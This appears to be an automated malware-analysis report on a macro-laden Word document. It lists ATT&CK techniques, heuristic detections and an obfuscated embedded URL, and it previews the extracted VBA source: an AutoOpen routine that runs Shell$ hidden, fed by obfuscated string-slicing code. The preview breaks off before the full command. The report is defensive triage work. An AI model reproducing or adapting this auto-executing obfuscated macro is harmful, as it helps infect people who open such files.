MALICIOUS
184
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an AutoOpen subroutine that calls the Shell() function. This indicates an attempt to execute arbitrary commands, likely to download and run a second-stage payload. The obfuscated URL found in the document is suspicious and may be related to the payload delivery.
Heuristics 7
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://wwwLdT+LdT.VEY+VEYyouVEY+VEYLdT+LdTrVEY+VLdT+LdTEYflynessVEY+VEY.VELdT+ In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 48365 bytes |
SHA-256: d25def6edd515142cc8b47829b96b139d40d8dc58f145e651e6b582942950546 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 44 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "HKbHadQwZ"
Sub AutoOpen()
LANKMSDAs = Array("qAruvjAw", "zIowuZOw", "izBkoWSl", "SukwXprD", "qRvibUqq")
lqNDjjQbw = Array("LiUBQETh", "FcBvBaHR", "kHcdjWJH", "KwwJOCid", "JzLHWCaN")
bAWrpvjPF = Array("mwcozSpY", "NqRFKTCu", "YlCOzuih", "PCjzSRPP", "iDcEGoMh")
Shell$ TUuWrYFBO, 0
WjJLJHQjU = Array("zRJhBFsP", "vYulpFvb", "BXHrwnjZ", "UsQlWXHl", "zfUAFhhz")
koLQRvjiN = Array("kHkJpWKi", "kMJpHtXR", "JmKlvVUp", "JHJcTHZL", "mXmQWcJJ")
KSVUYIcvo = Array("wHIWtSPn", "vziMhPcn", "zDjHGuhd", "BadzzRBi", "OoUzQptE")
End Sub
Function TUuWrYFBO()
vZEuNst = "M68s5t9ihdMMYCjXoKUZCncfSVONXmvEcmJbADjDfjpoIjsTRavSMqajikJbiqabZfGmsEXkbQuSzoWlcuvzrdslLZtPuIVoJOPdaGaNDKrvvImuNYwnvdjwmVaTKHqSvGIiZtLWUhthlwpDnwBWKhtjVbKW90UDizdq"
kizJo = Array("IovDYoqh", "RdipbKcK", "ljkbLXYG", "wMjkjLfb", "uXLErbOE")
ThwTB = Mid(vZEuNst, 13, 140)
VvOTYN = Array("zPWdIIGU", "pLZizvmq", "WaCTsmim", "shzjwjMM", "wOPbKufi")
KqHlYWi = "GwwOZcOKaOrv7uhWiSqEfHCwTYApzDVUMbTNjCKqfXfMFUINNcDGCGrMYI"
oZOvLmiXEDI = Array("lEwajPoR", "iwiujzwu", "ElqpwmVh", "tiQsUhfn", "ZbQYjNiV")
HVrfjzXTLq = Mid(KqHlYWi, 17, 40)
jvhWC = Array("bswbVERq", "EZoDWDwl", "NKVCchnN", "lfGiUXfK", "mdjPGalt")
rkwQv = "EsOzADsGiAoNS7w8s"
Mqkao = Array("rrcQjsKh", "wCRwwwsj", "XHAEvojt", "KItJWzNZ", "RsDYqpWl")
jJIctPAslAk = Mid(rkwQv, 8, 6)
mfzKUalwV = Array("DcNfXJDd", "fSqShZWv", "ruCuPTFF", "iSOPzmHh", "YXCWhRdJ")
PWizahwRs = "pMTw5fIONFULtJCLbYmjruiRNWVIGpiivlYnOIjIiYB8G"
wjAJuEiDVYZ = Array("jlbtIkzo", "bouFjvSv", "nUfiwFRj", "WmwiuGlP", "TDtvClBo")
alQRvBQ = Mid(PWizahwRs, 11, 32)
ZGjiUYBYFr = Array("YSiEAnIt", "iAMIkwmH", "VSFdjdfK", "ZRpCbwiZ", "KFBjWGwB")
zIafil = "WYB3ffFmh06q38pwodpcDbwOCYRkCtkiuREaZsccVVCUJzqQobwNNMiqDXXbhXTRwbQqMwJvBMHi0i"
KRMvapPqX = Array("piclwmmm", "pOqYuBLc", "WcbVBGDt", "QlmpDwZB", "wQjDnbSa")
sZRBcilJzS = Mid(zIafil, 17, 60)
zZWzrnECM = Array("tjsoNjoD", "APbGOjBA", "GGjZmQNP", "NriiAGzp", "TZcDbFHT")
SnwWP = "9Aw3IQ9YzGIJXNfquDANwnwDuZcQQkZowJGoAaMrQiGfrdDELlAzLREFORAKhBZvNdZLHrpUrJwShQLQVYFfjbdfEAZjaCKOFKSNDrzUvjGBUmXzFjoIvuLlAtHGRGuoziMXwzMdbljDVbLScbdrNBTKwjNKkqCplRBmZAzHWKhJLIQZiRcXwdd1ViMUQBFimncZ"
YAdFMUn = Array("SNfRjloB", "ZIrLVDmY", "UVtimsqk", "dLzZnwkh", "ahIoliWZ")
WjvFzNZkim = Mid(SnwWP, 14, 164)
watiPPPTzzh = Array("qUbDQbWM", "wAYEFIaH", "NBvaBRAF", "KmodVNWN", "FjUiWfaO")
bpDrSPCzcJ = "1jfibbbEjijvVCz8IqGAZ0A2QKdmLsCTUvdABlJaKzBCzLGXVYSZuhspTBzsprRfWkpEtUiiAKJWzpqMnwcnZdZmCnhzoQkTiWjPVCiAtoYjYVqdLkEtOdFtKDBFnfqjZqocHwU9wdzT"
jpWfdi = Array("OHjNjvrA", "jzcNpDtQ", "pjiNhdNd", "wYLZtwwC", "jAzRTtPO")
KnrXzhbrXnV = Mid(bpDrSPCzcJ, 29, 104)
tKzFIr = Array("Twirljvd", "FiRruwni", "YaoLZCGv", "JYBSQblt", "fVEpkWro")
uLiQWutrjKj = "5JPcR2t1TcpIiYZwYJamELkmvjUcFjfajzUdZAkstMjXdFzHzlzjAvviohkGFhOCzPciDwZYYisscMIpmMfThwZlDqorPimLzjZOdOEBMaHSCDCbZuTtCvVwqriMHhJuvjuvmuMYHdHGqR44sRo01DuIRbVNk"
RMCqwI = Array("LZvsEkSM", "pTmnYFdF", "LzPvPtIT", "TWmkTdts", "VTNVUivF")
GjnziCcWz = Mid(uLiQWutrjKj, 10, 132)
pcQGlLqGNJM = Array("UizFzzOF", "tNXNdHiN", "tEVZuPXz", "qDhUwZtB", "bsnBUBiB")
MRSojT = "ohjmmillwqZm8izNNvzDjdhJiOfwcIAYIbqqzPncXzORFkGimpzufTviYKazhjbzChikoGOzIXjjOPDwHzJmLFtpjISopnvqYQOYBVujbOmBLw59Z1BGz"
DZRPpMBfjj = Array("ojXvErap", "CJSwboZV", "lOoiAdGq", "sRwvXZoV", "twEEAiCF")
iMicdU = Mid(MRSojT, 14, 92)
SpAqjAf = Array("tQVlnVFi", "hvEsGMHC", "cSDsoXiG", "zIVcbrDm", "uKpiNGYE")
XTHQP = "VMElTmpowOVWnZwh3MJj9R8Qq1wFbI1pBpTiRvzJiTiYOmFWCdZXtCkWXJvTprtzWALvm"
LzLaiQwiCpz = Array("tDhruBXz", "WsIFqoiW", "VtEiDSCM", "klDOiKjw", "wSjzCfWw")
jLtFFSJrz = Mid(XTHQP, 35, 32)
ASIqYcL = Array("GrJDcpDz", "vsaTfPME", "NzzcDjWQ", "zumkziIp", "PRjBUOAi")
nEiUtWQ = "MOM3QGC36RzPmMVmGASkWdCpzVOQflOnXitwKCfKqjZVFUTzZUttBOoQZlwVKTLtGvjAcZbDVHuqEhjiBPqLrVmJpdXZEJAWUjPKkTWAspYuTwIGkm5FcGq1ATo7cbB"
XiNiAsqdn
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.